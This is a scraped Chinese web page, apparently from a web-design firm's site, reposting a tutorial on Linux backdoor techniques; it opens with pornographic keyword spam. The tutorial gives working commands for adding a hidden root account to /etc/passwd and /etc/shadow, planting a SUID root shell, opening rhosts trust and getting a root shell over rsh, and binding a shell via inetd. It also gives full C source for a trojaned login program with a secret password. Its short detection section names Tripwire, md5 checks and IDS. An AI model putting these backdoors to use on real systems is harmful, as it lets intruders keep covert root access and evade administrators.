日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Linux后門技術(shù)及實踐方法談完整版

 以下的文章主要描述的是Linux后門技術(shù)及實踐方法,假如你在實際操作中遇到Linux后門技術(shù),但是你卻不知道對Linux后門技術(shù)如何正確的解決,那么以下的文章對你而言一定是良師益友。以下就是文章的主要內(nèi)容描述。

成都創(chuàng)新互聯(lián)公司專注于企業(yè)成都營銷網(wǎng)站建設、網(wǎng)站重做改版、鄞州網(wǎng)站定制設計、自適應品牌網(wǎng)站建設、html5、購物商城網(wǎng)站建設、集團公司官網(wǎng)建設、外貿(mào)營銷網(wǎng)站建設、高端網(wǎng)站制作、響應式網(wǎng)頁設計等建站業(yè)務,價格優(yōu)惠性價比高,為鄞州等各大城市提供網(wǎng)站開發(fā)制作服務。

后門簡介

入侵者完全控制系統(tǒng)后,為方便下次進入而采用的一種技術(shù)。

一般通過修改系統(tǒng)配置文件和安裝第三方后門工具來實現(xiàn)。 具有隱蔽性,能繞開系統(tǒng)日志,不易被系統(tǒng)管理員發(fā)現(xiàn)等特點。

Linux后門技術(shù)

增加超級用戶賬號

破解/嗅探用戶密碼

放置SUID Shell

rhosts + +

利用系統(tǒng)服務程序

TCP/UDP/ICMP Shell

Crontab定時任務

共享庫文件

工具包rootkit

可裝載內(nèi)核模塊(LKM)

增加超級用戶 # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd

# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

如果系統(tǒng)不允許uid=0的用戶遠程登錄,還需要增加一個普通用戶賬號。

破解/嗅探用戶密碼

獲得shadow文件后,用John the Ripper 工具破解薄弱的用戶密碼。安裝sniffit等嗅探工具,監(jiān)聽telnet、ftp等端口,收集用戶密碼。

放置SUID Shell # cp /bin/bash /dev/.rootshell

# chmod u+s /dev/.rootshell

普通用戶在本機運行/dev/.rootshell,即可獲得一個root權(quán)限的shell。 rhosts + +

# echo "+ +" > /.rhosts

# rsh -l root victim.com csh -i

遠程可以得到一個rootshell。

利用系統(tǒng)服務程序

修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替換in.telnetd、in.rexecd等inted的服務程序

重定向login程序

TCP/UDP/ICMP Shell

BindShell,大部分是基于TCP/UDP協(xié)議的網(wǎng)絡服務程序,在高端口監(jiān)聽,很容易被發(fā)現(xiàn)。Ping Backdoor,通過ICMP包激活后門,形成一個Shell通道。

TCP ACK數(shù)據(jù)包后門,能夠穿越防火墻。

Crontab定時任務

Linux后門技術(shù)中通過Crontab程序調(diào)度已安裝的后門程序定時運行,一般在深夜時段,是系統(tǒng)管理員不在線的時間。

共享庫文件

在共享庫中嵌入后門函數(shù)使用后門口令激活Shell,獲得權(quán)限能夠躲避系統(tǒng)管理員對二進制文件本身的校驗

工具包rootkit

包含一系列系統(tǒng)及后門工具:

清除日志中的登錄記錄

偽裝校驗和

替換netstat、ps等網(wǎng)絡工具

后門登錄程序易于安裝和使用

可裝載內(nèi)核模塊(LKM)

LKM:Loadable Kernel Modules 動態(tài)的加載,不需要重新編譯內(nèi)核。

截獲系統(tǒng)調(diào)用,具有隱藏目錄、文件、進程、網(wǎng)絡連接等強大功能。

自身隱蔽性好,發(fā)現(xiàn)難度較大。

著名的LKM包有adore和knark。

后門的檢測

以自己的經(jīng)驗,結(jié)合特定的工具,手工作一些檢測。

使用Tripwire或md5校驗來檢查系統(tǒng)。

借助IDS系統(tǒng),監(jiān)聽到目標機器的可疑網(wǎng)絡連接。

實例:login后門

入侵者先把原始的/bin/login備份,再用一段程序替換/bin/login。入侵者telnet登錄進來的時候,通過環(huán)境變量或者終端類型

傳遞了正確的后門密碼,將直接獲得一個Shell;如果是普通用戶登錄,將會重定向到原始的login文件,來處理正常的登錄。

最簡單的login后門ulogin.c源代碼如下:

實例:login后門 #include

#define PASSWORD "passWORD"

#define _PATH_LOGIN "/sbin/logins"

main (argc, argv, envp)

int argc;

char **argv, **envp;

{

char *display = getenv("DISPLAY");

if ( display == NULL ) {

execve(_PATH_LOGIN, argv, envp);

perror(_PATH_LOGIN);

exit(1);

}

if (!strcmp(display,PASSWORD)) {

system("/bin/csh");

exit(1);

}

execve(_PATH_LOGIN, argv, envp);

exit(1);

}

以上的相關內(nèi)容就是對Linux后門技術(shù)及實踐方法談完整版的介紹,望你能有所收獲。


當前標題:Linux后門技術(shù)及實踐方法談完整版
文章網(wǎng)址:http://www.5511xx.com/article/copjjho.html